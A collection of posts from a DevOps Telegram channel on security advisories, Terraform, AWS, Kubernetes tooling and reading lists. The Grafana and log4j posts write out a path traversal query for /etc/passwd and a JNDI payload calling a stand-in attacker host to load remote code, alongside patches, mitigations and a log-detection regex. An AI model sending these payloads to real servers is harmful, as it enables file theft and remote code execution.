CatOps
DevOps and other issues by Yurii Rochniak (@grem1in) - SRE @ Preply && Maksym Vlasov (@MaxymVlasov) - Engineer @ Star. Opinions are our own.

We do not post ads including event announcements. Please, do not bother us with such requests!
A short but insightful article by GitLab on how to perform threat modelling.

It covers some basics, like building diagrams, and describes the popular STRIDE framework for threat modelling.

STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Repudiation - Claiming to have not performed an action
- Information disclosure - Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization

Here you can find a slightly more detailed description of each area with some examples.

P.S. In general, GitLab has a lot of great, freely available documentation and blog posts, not only on security or operational topics but on various aspects of work. I strongly suggest checking out their handbook. Maybe you can find some guidance there on topics that are important for you at the moment.

#security
I'm a bit hesitant about posting hot news, because there are usually people who do that faster than me.

This one is worth mentioning, though. Grafana fixed a 0-day vulnerability that was discovered yesterday.

The vulnerability in a nutshell, in case you've missed it: you were able to access restricted locations with a query like this one:
 /public/plugins/<PLUGIN>/../../../../../../../etc/passwd
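
To see why a path like this escapes the plugin directory, here is a minimal Python sketch of the general path traversal problem and the usual containment check. This is not Grafana's actual code (Grafana is written in Go); the directory /var/lib/grafana/plugins/demo and the helpers resolve and is_inside are hypothetical names used for illustration only.

```python
import posixpath

def resolve(base_dir: str, requested: str) -> str:
    """Join a user-supplied relative path onto base_dir and normalise it."""
    return posixpath.normpath(posixpath.join(base_dir, requested))

def is_inside(base_dir: str, requested: str) -> bool:
    """Return True only if the resolved path stays within base_dir."""
    base = posixpath.normpath(base_dir)
    resolved = resolve(base, requested)
    return resolved == base or resolved.startswith(base + "/")

# Hypothetical plugin directory, assumed for this example only.
PLUGIN_DIR = "/var/lib/grafana/plugins/demo"
TRAVERSAL = "../../../../../../../etc/passwd"

# Each ".." climbs one level; extra ones are ignored once the root is reached.
print(resolve(PLUGIN_DIR, TRAVERSAL))
print(is_inside(PLUGIN_DIR, "img/logo.svg"))
print(is_inside(PLUGIN_DIR, TRAVERSAL))
```

A server that serves the joined path without a check like is_inside would happily return files outside the plugin directory.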


Versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!

#security
Astrologers have declared a week of application delivery.

So today, I want to share with you an article that touches on the problem of delivering infrastructure dependencies in the modern world.

The problem statement is that almost no applications run purely on their own, especially if we're talking about corporate backend services. These applications require databases, queues, blob storage and many more dependencies to run correctly.

Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics. It likely doesn't make much sense from a business point of view. On the other hand, creating a separate team to provide dependencies on demand literally brings us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.

In this article, the author argues that bundling application dependencies together with the codebase is the best way to go. One can have a team that delivers these building blocks, and developers then combine them like Lego in their config files.

This is a very interesting approach (at least for me) and I truly believe that this will be the next big thing in the DevOps-ish world. As for now, though, the author mentions a few tools that could help here. However, in my humble opinion, the existing toolset is not quite there yet and there is still a long way to go.

P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts on this topic. Stay tuned!

#app_bundle #kubernetes #crossplane
Terraform 1.1.0 was released, and maybe the most interesting feature is the ability to force variables to be non-null:

# Non-nullable with a default: if left unset, or set explicitly to null, then
# it takes on the default value.
# In this case, the module author can safely assume var.e will never be null.
variable "e" {
  nullable = false
  default  = "hello"
}

# Non-nullable with no default: the variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null.
variable "d" {
  nullable = false
}


By default, all variables are implicitly set to nullable = true.
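
The rules from the comments above can be modelled as a small Python function. This is only a toy model, not how Terraform is implemented; resolve_variable and the UNSET sentinel are hypothetical names. It also assumes that, for a nullable variable, an explicit null is passed through as-is instead of being replaced by the default, which is how I read the Terraform documentation.

```python
UNSET = object()  # sentinel: the caller did not pass the variable at all

def resolve_variable(value=UNSET, *, default=UNSET, nullable=True):
    """Return the value a module would see for an input variable."""
    if value is UNSET:
        if default is UNSET:
            raise ValueError("variable must be set")
        return default
    if value is None:
        if nullable:
            return None  # assumption: explicit null wins over the default
        if default is UNSET:
            raise ValueError("variable cannot be null")
        return default   # non-nullable: null falls back to the default
    return value

# variable "e": nullable = false, default = "hello"
print(resolve_variable(default="hello", nullable=False))
print(resolve_variable(None, default="hello", nullable=False))

# The same variable with the implicit nullable = true
print(resolve_variable(None, default="hello"))
```

The last call is the case the new flag is meant to prevent: without nullable = false, module code has to handle null itself.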

#terraform
0-day vulnerability found in the popular Java log4j library.

Now, why is it important?

You may like Java or not, but it is a crazily popular programming language. It runs on billions of devices, blah-blah.

log4j is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape, and they write logs, chances are high they use log4j.

The exploit is stupidly simple. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here is how it works:

1. Data from the user is sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the "Java Naming and Directory Interface" (JNDI),
4. The response contains a path to a remote Java class file (e.g. https://second-stage.attacker.com/Exploit.class), which is injected into the server process,
5. This injected payload triggers a second stage, and allows the attacker to execute arbitrary code.

It looks like the quickest mitigation is to set the -Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10, or to re-configure the JDK.

Also, check your Java services' logs. Maybe you have already been hit.
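
For a first pass over the logs, something as simple as the Python sketch below can help. It only looks for the plain ${jndi: marker from the example payload above; obfuscated variants of the payload will not match, so treat a clean result as inconclusive. The helper name find_suspicious_lines and the sample log lines are made up for illustration.

```python
import re

# Matches the literal "${jndi:" marker, ignoring case.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

def find_suspicious_lines(lines):
    """Return (line_number, line) pairs that contain a JNDI lookup marker."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if JNDI_PATTERN.search(line)
    ]

# Made-up log lines, for illustration only.
sample = [
    'GET /index.html 200 "Mozilla/5.0"',
    'GET /login 200 "${jndi:ldap://attacker.com/a}"',
]

for number, line in find_suspicious_lines(sample):
    print(f"line {number}: {line}")
```

To scan a real file, pass an open file object instead of the list, since it is also an iterable of lines.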

#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6

These releases contain patches for various security vulnerabilities, including one with High severity.

So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!

#gitlab #security
Amazon has published a public postmortem for the recent issues on Friday. However, it went a little bit unnoticed because of the Log4j story (see one of the previous posts).

So, the original issue happened to be a cascading failure, which led to congestion in AWS internal networks. This is an interesting part, because it sheds some light on AWS internals.

So, the internal monitoring system as well as parts of the control plane for EC2 reside in the internal network, which experienced issues. That's why the AWS team was operating with only partial visibility into their systems, which slowed down the resolution.

Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them nor start a new one. This happened to be more critical for certain services within AWS, like API Gateway and Amazon Connect.

The interesting thing is that these events were caused by code that had been there for years (according to AWS). Unfortunately, the unexpected behavior was revealed during an automated scaling event.

To mitigate such issues in the future, AWS switched off automatic scaling in us-east-1. They claim that they already have enough capacity. They're also working on a fix for the part of the code that caused the congestion in the first place. I assume there are many other internal action items from this outage as well.

#aws #postmortem
Last week, I promised a series of posts about modern application delivery. Last time, we briefly discussed the problems caused by the disconnect between application code and its infrastructure dependencies.

Today, let's talk about a proposed formal way of solving this issue - the Open Application Model (OAM). This is a specification of an application bundle definition that contains all the required components as well as traits (we'll talk about those later). The main purpose is to provide a reasonable abstraction for customers, so they can use components and traits as building blocks for their application's infra dependencies.
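
To make the "building blocks" idea a bit more tangible, here is a rough Python sketch of an application made of components with traits attached. It is only a mental model: the classes are not the OAM specification's schema or any KubeVela API, and the "webservice" and "scaler" type names, the image and the properties are placeholders picked for illustration.

```python
from dataclasses import dataclass, field

@dataclass
class Trait:
    """An operational add-on attached to a component (e.g. scaling)."""
    type: str
    properties: dict = field(default_factory=dict)

@dataclass
class Component:
    """A deployable piece of the application (a service, a database, ...)."""
    name: str
    type: str
    properties: dict = field(default_factory=dict)
    traits: list = field(default_factory=list)

@dataclass
class Application:
    """The bundle: everything the application needs, in one definition."""
    name: str
    components: list = field(default_factory=list)

    def to_dict(self) -> dict:
        return {
            "name": self.name,
            "components": [
                {
                    "name": c.name,
                    "type": c.type,
                    "properties": c.properties,
                    "traits": [
                        {"type": t.type, "properties": t.properties}
                        for t in c.traits
                    ],
                }
                for c in self.components
            ],
        }

# Placeholder values, assumed for this example only.
app = Application(
    name="my-app",
    components=[
        Component(
            name="backend",
            type="webservice",
            properties={"image": "example/backend:1.0"},
            traits=[Trait(type="scaler", properties={"replicas": 3})],
        )
    ],
)
print(app.to_dict())
```

The split is the point: a platform team defines which component and trait types exist, while a developer only fills in the names and properties.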

This concept was proposed by people from Alibaba Cloud (and Microsoft?) and the whole thing is fairly new. However, it already has an implementation for Kubernetes - KubeVela. That said, I still have unanswered questions about this tool. For example, is it possible to provide default traits? What should I do if I want all my apps to have an autoscaler, etc.?

In any case, those are implementation details. Nothing stops you from embracing concepts of OAM and implementing them using, let's say, Helm.

As a bonus, here is a great video by Viktor Farcic about KubeVela with a basic "Hello world" example. It helps to better understand the problem that OAM is trying to solve as well as its concepts like components, traits and the difference between them. 'Coz the official documentation, let's be honest, is not that great.

https://youtu.be/2CBu6sOTtwk

#oam #app_bundle #kubernetes
I don't know a corresponding idiom in English, so I'll put it as it is.

Наша пісня гарна й нова - починаймо її знову! (Literally: "Our song is nice and new, so let's start it all over again!")

The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.


P.S. If you know the corresponding idiom in English, please, let me know in the chat.

#security
Holiday Book Recommendations by Gergely Orosz - an author of The Pragmatic Engineer blog.

It's a bit unfortunate for me that this article was published on the 17th of December, when I had already bought some engineering books before the end of the year (we have a special budget for that in my company). However, 4 out of 5 books I’ve bought are on this list :)
The only exception is Database Internals, but I guess this book is just too specific for a generic IT book recommendation.

So, I hope you can find something interesting for you in this list! There are multiple categories there, from engineering management to technology-specific topics. Also, “The Pragmatic Engineer” is a really cool blog about IT in general as well as some European specifics. I read it myself and can totally recommend it!

Happy upcoming holidays!

#books
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability

Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.

#security
Yet another post from the #app_bundle series. This is again a video from Viktor Farcic on how to combine ArgoCD, Crossplane, and KubeVela to completely abstract Kubernetes away from your product engineers aka developers and (allegedly) make their lives easier.

At the end of each year, many people make predictions about what the upcoming year will look like. And I can say that abstracting clusters away will be a big thing in the industry. This brings us to the logical question: "So, why do all this stuff and not just use serverless options out of the box?". I will let you answer this question on your own.

P.S. You can save this post to blame me later, if this prediction happens to be wrong.

#kubernetes #cicd
I re-designed my blog not just for the sake of re-designing. At least, I hope so.

So, here is a new article from a wannabe series about Kubernetes.

This series started with a review of the Velero backup tool. Now, I want to extend this topic a bit and share my thoughts on whether it makes sense to back up a Kubernetes cluster at all.


P.S. This is the last technical article on my blog this year. I usually do a generic recap of the year, but haven't done one yet. Also, this is the last post in the CatOps channel this year.

Wish y'all reliability during the festive season and only five nines in the new year!

#kubernetes #backup #blog
From our subscribers.

People can use AWS Elastic Container Registry to cache public Docker images.

From their press release:

This new capability gives AWS customers a simple and highly available way to pull Docker Official Images, while taking advantage of the generous AWS Free Tier. Customers pulling images from Amazon ECR Public to any AWS Region get virtually unlimited downloads. For workloads running outside of AWS, users not authenticated on AWS receive 500 GB of data downloads each month. For additional data downloads, they can sign up or sign in to an AWS account to get up to 5TB of data downloads each month after which they pay $0.09 per GB.

If you have any interesting things to share, you can always do it in our chat!

#aws
New Year's resolutions are a very common practice. I do mine as well, but this time I want to share a review of databases in 2021 by Dr. Andy Pavlo.

Some points from the article:

- RDBMS is an old concept, but it dominates the market even for greenfield projects and it's here to stay
- PostgreSQL is gaining more and more popularity. It might not be the most popular database, but it is steadily moving to the top
- “…only old people care about official TPC numbers.”
- More and more money is invested into DB-related startups. The size of each funding round has also increased compared to previous big ones. “We are in the golden era of databases. There are so many excellent choices available today. Investors are searching for database start-ups that can become the next Snowflake-like IPO.”
- People have moved away from MapReduce and Hadoop technologies nowadays.
- Larry Ellison - a co-founder of Oracle - is back in 5th position on the list of the richest people

#databases
Now that everybody has patched their Log4j dependencies and come back from the holidays, it's time to process what just happened.

In his article Professional Maintainers: a Wake-up Call, Filippo Valsorda argues that the current open-source model is unsustainable. Thus, the only viable way to change this status quo, in his opinion, is for open-source maintainers to start issuing invoices to companies that require support or new features.

I know that such maintainers already exist, but this is definitely not a common practice.

Anyways, there are so many non-sustainable things in this world and our usual way of solving them is to pretend that they don't exist. So, let this article be just an invitation to think about the current state of affairs.

P.S. If you're a maintainer or a contributor to an open-source project, you're doing God's work! Thank you!

#open_source #culture
Yesterday I shared this video in our chat and it looks like people liked it. So, I would like to share it here with a broader audience.

In this video, Viktor Farcic speaks about AWS Karpenter and its advantages compared to the good old cluster-autoscaler.

A few notable things:
- Karpenter is workload-aware. It means that it can determine how many resources your workload needs and scale up the cluster accordingly. So, if you need to place just a tiny pod, you’ll get a smaller node compared to when you need to run a few heavy tasks
- Karpenter is topology-aware. So, for example, you can schedule nodes for a given workload in a specific AZ only. It’s neat if you use EBS volumes or additional network interfaces
- It’s groupless, meaning that it doesn’t have a concept of “instance groups” like cluster-autoscaler (and many other autoscalers). So, while cluster-autoscaler modifies the parameters of an instance group, Karpenter, on the other hand, talks to AWS APIs directly. In theory, this should reduce scale-up and scale-down times
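
The "workload-aware" point can be illustrated with a toy Python sketch: sum up what the pending pods request and pick the smallest node type that fits. This is a deliberate simplification and not Karpenter's real algorithm; the instance catalog, the pick_instance helper and all the numbers are invented for the example.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class InstanceType:
    name: str
    cpu: float         # vCPUs
    memory_gib: float  # GiB of RAM

# Invented catalog, assumed for this example only.
CATALOG = [
    InstanceType("small", 2, 4),
    InstanceType("medium", 4, 16),
    InstanceType("large", 16, 64),
]

def pick_instance(pending_pods, catalog=CATALOG):
    """Pick the smallest instance type that fits all pending pods.

    pending_pods is a list of (cpu, memory_gib) requests.
    Returns None if nothing in the catalog is big enough.
    """
    need_cpu = sum(cpu for cpu, _ in pending_pods)
    need_mem = sum(mem for _, mem in pending_pods)
    fitting = [
        i for i in catalog
        if i.cpu >= need_cpu and i.memory_gib >= need_mem
    ]
    if not fitting:
        return None
    return min(fitting, key=lambda i: (i.cpu, i.memory_gib))

print(pick_instance([(0.25, 0.5)]))       # one tiny pod
print(pick_instance([(3, 8), (4, 16)]))   # a few heavy tasks
```

An instance-group-based autoscaler, by contrast, can only add more nodes of whatever size the group was configured with.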

#kubernetes #aws
Morning! New Year - new HUG Kyiv events. Now, with HashiCorp co-founders

What: Q/A session with Mitchell Hashimoto and Armon Dadgar
You can ask and vote for questions via this link.

Who: Mitchell Hashimoto and Armon Dadgar and one of your old friends as moderator ;)

When: Thursday 3rd February, 19:50 (Kyiv TZ)
Where: Online
Language: English

Please, register here

#event
Mess with DNS

Julia Evans has built a site where you can do experiments with DNS. It shows you a live stream of all DNS queries coming in for records on the free subdomain provided to you (a “behind the scenes” view).

You can make up your own experiments or check out her examples of experiments you can try, including "weird" (when you break something), "useful" and "tutorial" experiments.
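
If you're curious what one of those incoming DNS queries looks like on the wire, here is a small Python sketch that builds a standard query for an A record by hand. It is unrelated to how the site itself is implemented; build_dns_query, the query ID and example.com are arbitrary choices for the example.

```python
import struct

def build_dns_query(name: str, query_id: int = 0x1234, qtype: int = 1) -> bytes:
    """Build a minimal DNS query packet (qtype 1 = A record)."""
    # Header: ID, flags (0x0100 = recursion desired), then four counters:
    # 1 question, 0 answers, 0 authority records, 0 additional records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)

    # The name is encoded as length-prefixed labels, ending with a zero byte.
    labels = name.rstrip(".").split(".")
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in labels
    ) + b"\x00"

    # Question: encoded name, query type, query class (1 = IN, Internet).
    question = qname + struct.pack("!HH", qtype, 1)
    return header + question

packet = build_dns_query("example.com")
print(len(packet), packet.hex())
```

Sending these bytes over UDP to port 53 of a resolver is all a basic lookup does; the query name is what shows up in the live stream on the site.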

#dns